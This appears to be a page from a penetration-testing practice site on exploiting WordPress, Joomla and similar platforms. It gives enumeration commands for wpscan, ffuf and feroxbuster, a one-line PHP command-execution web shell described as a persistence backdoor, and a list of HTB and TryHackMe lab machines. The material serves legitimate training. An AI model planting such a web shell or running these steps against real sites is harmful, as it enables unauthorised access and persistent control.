ZeroBox

CMS Exploitation (WordPress, Joomla): practice machines and key commands

Content management systems and common platforms are popular targets because they are widely deployed and often outdated. Identify the product and version from headers, generator tags and static file paths, then enumerate plugins, themes and users. WPScan covers WordPress, and similar scanners exist for Joomla and Drupal. A vulnerable plugin can give file read, SQL injection or upload, while an admin login lets you edit a theme or install a plugin containing a web shell. Weak or default passwords on admin panels, Jenkins script consoles and monitoring tools such as Splunk are a frequent shortcut. Check configuration files for database credentials once you have a foothold. These machines run recognisable software with exploitable weaknesses. Always back up what you change in an admin panel and remove the shell afterwards.

Key commands

Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.

WPScan WordPress Enumeration & Attack

Enumerate vulnerable plugins, themes, and usernames on WordPress sites.

wpscan --url http://{TARGET_IP}/ --enumerate ap,at,u,cb --plugins-detection aggressive

ffuf Directory & Endpoint Fuzzing

High-speed directory enumeration with auto-calibrated filtering and extension recursion.

ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://{TARGET_IP}/FUZZ -e .php,.html,.txt,.bak,.js -ac -mc 200,301,302,403

Feroxbuster Recursive Crawl & Fuzz

Deep Rust recursive crawler with smart 404 detection and auto-extract.

feroxbuster -u http://{TARGET_IP}/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,asp,aspx,jsp -d 2

Minimal PHP Single-Line Backdoor

Lightweight PHP command execution backdoor for quick web root persistence.

echo '<?php system($_GET["cmd"]); ?>' > shell.php

Keep going

CMS Exploitation (WordPress, Joomla) machines (17)

3 of these are machines I solved myself and are listed first within each difficulty. Machines are matched by their technique tags. 14 Linux, 3 Windows.

Very Easy (2)

MachinePlatformOSTags
IgnitionHTBLinuxhttp, cms, credentials, starting-point
PennyworthHTBLinuxJenkins, Groovy, RCE, Default Credentials

Easy (2)

MachinePlatformOSTags
AlfredTHMWindowsOSCP, Jenkins, PowerShell, Token Impersonation
ArmageddonHTBLinuxDrupal, HTB

Medium (8)

MachinePlatformOSTags
Mr Robot CTFTHMLinuxWordPress, Wp-login, Dictionary-Attack, Nmap-SUID
BenignTHMLinuxTHM, Splunk
Boiler CTFTHMLinuxJoomla, Sar2HTML, SUID
HawkHTBLinuxDrupal, HTB, IppSec-Hawk-video)
Investigating with SplunkTHMLinuxTHM, Splunk
PS EclipseTHMLinuxTHM, Splunk
RunnerHTBLinuxCPTS, TeamCity, CVE-2024-27198, Portainer
SmolTHMLinuxTHM, nmap, wpscan, www.cyberchef.com

Hard (5)

MachinePlatformOSTags
Daily BugleTHMLinuxOSCP, Joomla, SQLi, CVE-2019-8942
InternalTHMLinuxWordPress, Tunneling, Jenkins, Docker-Breakout
ObjectHTBWindowsHTB, Jenkins
RetroTHMWindowsWordPress, RDP, CVE-2019-1388
VulnNet: InternalTHMLinuxSMB, Redis, TeamCity, Tunneling

Related techniques

Practise it, then track it. Log every box and the commands you used in ZeroBox. Open ZeroBox